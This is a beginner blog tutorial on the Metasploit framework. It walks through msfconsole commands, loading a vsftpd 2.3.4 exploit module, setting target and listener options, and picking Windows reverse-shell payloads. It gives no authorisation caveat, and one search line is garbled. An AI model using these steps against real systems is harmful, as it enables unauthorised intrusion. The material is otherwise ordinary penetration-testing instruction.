How To Use Metasploit For Advance Pentation Testing
Today we will have a look at Metasploit which is one of the best Exploitation framework owned by Rapid7 and is integrated with many exploits to gain access to the target system. Metasploit is written in Ruby Language and comes pre-packaged with many exploits, scanners, encoders that can perform different tasks. Metasploit has a large database that has more than 2000 exploits related to all the protocol versions and also related to Windows, Linux and much more.
Features:
1. It comes pre-packaged with Kali Linux and Parrot OS.
2. It is constantly updated and new exploits are added to it every 2 to 3 days.
3. It also can scan the target for open ports and also for vulnerabilities. They are called auxiliary modules.
4. Whenever an interesting exploit is discovered it is soon added to the Metasploit Framework.
5. It also has an additional functionality called a meterpreter which is a kind of shell with very advanced functionalities.
6. It can be used for both exploitation and post-exploitation.
7. It also includes exploit related to Android devices and also related VoIP and other attacks.
8. It also can attack various IoT devices.
9. With msfvenom we can create a malicious payload which when executed can be used to gain access to our target machine
Some Important Terms:
Exploit: It is a piece of code that triggers the vulnerability and successfully exploit it
Payload: It is the piece of code that is run after the exploit has successfully executed on the victim. The payload can be made to gain shell or to perform malicious tasks.
How to Use?
To launch Metasploit you can type the command "msfconsole" on your terminal.
>>msfconsole
#Now we would see that the Metasploit has loaded and we are greeted with a banner
To change the banner we can use the banner command on the msf terminal.
msf> banner
To make the loading of Metasploit even faster we can start the PostgreSQL service.
>>service PostgreSQL start
1. search utility - search is used to search for strings such as
msf>search exploits - search for all the exploits
search MySQL - search for all exploits and Auxillary with keyword MySQL.
search FTPreadysummarizean for all modules having word FTP
@ Like this we can search for exploits and Auxillary modules related to our needs
2. Now when you have selected which exploit you want to use now we have to select that exploit. We can do that by the 'use' command.
msf>use exploit/ftp/vsftpd2.3.4
This will load the specified exploit and you will notice that the exploit name is shown in red colour.
This is an indication that the exploit was successfully loaded.
3. Now we have to set some options which we need to run the exploit. The options may include the RHOST, LHOST, LPORT and sometimes password or hashes or even wordlists.
LHOST = Local Host(your IP)
RHOST = Remote Host (victim IP)
show options = This will show you all the options you need to set to the exploit you just loaded for it to run properly.
Synatx to set Value: set <option> (value)
For example, set LHOST 182.168.45.33
set LPORT 4444
Similarly, we can set all the required options
4. Now we have set all the options so now it is time to set the payload which would be executed when our exploit code is successfully executed.
To see all the available payload type "show payloads "
Now we will see all supported payload with our supported exploit.
Use set payload <payload name> to set the payload .
Now Everything is done and we are ready to run the exploit. Before that let's summarize:
1. Select an exploit
2. Show options
3. Set option
4. Show payload
5. Set payload
6. RUN !!
To run the exploit just type "run", "exploit" and if your target would be vulnerable then our payload would get executed and the task of the payload would be performed.
Most common payload is
windows/shell/reverse_tcp
windows/meterpreter/reverse_tcp
The above 2 payloads are used to get a shell on your windows to target if your exploit was successful.
@The Metasploit is very vast. As vast as you can't think! This was just a guide that has made you familiar with Metasploit and how to launch an attack on Metasploit.
There are also advance ways which you can use to evade firewall while attacking and meterpreter which is itself a very vast post-exploitation topic which we would not cover.
For more information about Metasploit, you can refer to the offensive security Metasploit Unleashed article to get a detailed guide about Metasploit and all its components.
There are also many auxiliary modules that I have not covered but I hope that after reading this guide you could use them on your own from the above understanding because the process is the same : )
Reference
Link: https://www.offensive-security.com/metasploit-unleashed/
- Dipanshu Pandey
Comments